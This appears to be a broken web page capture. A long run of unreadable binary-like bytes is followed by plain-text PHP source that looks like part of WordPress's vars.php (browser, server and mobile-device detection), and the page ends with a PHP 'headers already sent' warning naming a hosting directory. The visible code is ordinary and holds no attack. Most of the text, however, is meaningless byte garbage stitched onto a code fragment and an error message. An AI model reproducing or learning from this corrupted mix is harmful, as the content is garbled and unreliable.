Jڛ B5?#đa#T x26"C5g_O)>lHJd}v׸` W^b2pt_$t1\XH VA,dѢ4FNx jfM Ƨ#ˬtÒM~kBf=+L F$Bs q 3-llgPj4K-q?3c#ɛ֩5-&O^,`nBxvuiu#\[@wo$81e(j@[?ҩ ◹u'r@&:bۊISVU ^y 6A S/ _&I&M8Z)A4FBZVhFT)%͞iĀ6ٯOfPH)yo%D T\;tt}sVpPӗ&7l^Ʉ< oC" 6D\&uC6LK C=x򢜷't/rUXp}2H1lQ%.kB=ݭHO,܍Yi\ب?&0L<\'A3[o61 A-a \|N[By9Ը./#}UiT67Li}xx8_FeDFTᨮiZۄ;W:9\FĔM+V ̰37l#fzL&ebWhͫ'% S9n %7v#+T+aJ|j)HKds; CE سkT2\!I͡u鄰8[Z>CH/caDؔ |S`MSAmEqUSҷìzWx"[rmKWJBwVfLÉuҁ;`'S\!Ӳt;0?-n%/TS%LQ@оOqYrf<CVN[Upܿ_A"?7獜y>.f?,p' K5Vqt=b(^zw.߿gO)CEϼEA X7 VV~DACeZfdu7H?d]-=U(7bXZ>˄)2NS l4Ny|NSFε5ZVQCa@0 tɝ5h)Vw:߭Rnd$q5嵐 lzw? d?LOz֢ }a`zBI(@qB\e*-" 7l\u."ŮXU51z; ֻD~YKލ|S8#ߴxî,2Hn.[ <[99sbw=z:f$>+&Ye2 y(c,"|!f -8{vo9}c/ }Dqm7BL'"!_=gCN_R)&;0)K*x̜g&R+EGLS3?c0>mKGs,x90)3=OhL$W! _lxR}Z e@u%v> UKAl~>~nm %/IR'E`Mlhۘ#23rՋӐU'7{eif ( strpos($_SERVER['HTTP_USER_AGENT'], 'Gecko') !== false ) { $is_gecko = true; } elseif ( strpos($_SERVER['HTTP_USER_AGENT'], 'Opera') !== false ) { $is_opera = true; } elseif ( strpos($_SERVER['HTTP_USER_AGENT'], 'Nav') !== false && strpos($_SERVER['HTTP_USER_AGENT'], 'Mozilla/4.') !== false ) { $is_NS4 = true; } } if ( $is_safari && stripos($_SERVER['HTTP_USER_AGENT'], 'mobile') !== false ) $is_iphone = true; $is_IE = ( $is_macIE || $is_winIE ); // Server detection /** * Whether the server software is Apache or something else * @global bool $is_apache */ $is_apache = (strpos($_SERVER['SERVER_SOFTWARE'], 'Apache') !== false || strpos($_SERVER['SERVER_SOFTWARE'], 'LiteSpeed') !== false); /** * Whether the server software is Nginx or something else * @global bool $is_nginx */ $is_nginx = (strpos($_SERVER['SERVER_SOFTWARE'], 'nginx') !== false); /** * Whether the server software is IIS or something else * @global bool $is_IIS */ $is_IIS = !$is_apache && (strpos($_SERVER['SERVER_SOFTWARE'], 'Microsoft-IIS') !== false || strpos($_SERVER['SERVER_SOFTWARE'], 'ExpressionDevServer') !== false); /** * Whether the server software is IIS 7.X or greater * @global bool $is_iis7 */ $is_iis7 = $is_IIS && intval( substr( $_SERVER['SERVER_SOFTWARE'], strpos( $_SERVER['SERVER_SOFTWARE'], 'Microsoft-IIS/' ) + 14 ) ) >= 7; /** * Test if the current browser runs on a mobile device (smart phone, tablet, etc.) * * @return bool true|false */ function wp_is_mobile() { static $is_mobile; if ( isset($is_mobile) ) return $is_mobile; if ( empty($_SERVER['HTTP_USER_AGENT']) ) { $is_mobile = false; } elseif ( strpos($_SERVER['HTTP_USER_AGENT'], 'Mobile') !== false // many mobile devices (all iPhone, iPad, etc.) || strpos($_SERVER['HTTP_USER_AGENT'], 'Android') !== false || strpos($_SERVER['HTTP_USER_AGENT'], 'Silk/') !== false || strpos($_SERVER['HTTP_USER_AGENT'], 'Kindle') !== false || strpos($_SERVER['HTTP_USER_AGENT'], 'BlackBerry') !== false || strpos($_SERVER['HTTP_USER_AGENT'], 'Opera Mini') !== false || strpos($_SERVER['HTTP_USER_AGENT'], 'Opera Mobi') !== false ) { $is_mobile = true; } else { $is_mobile = false; } return $is_mobile; }
Warning: Cannot modify header information - headers already sent by (output started at /home/u109327/rpmgzru/www/wp-includes/vars.php:89) in /home/u109327/rpmgzru/www/wp-includes/pluggable.php on line 1185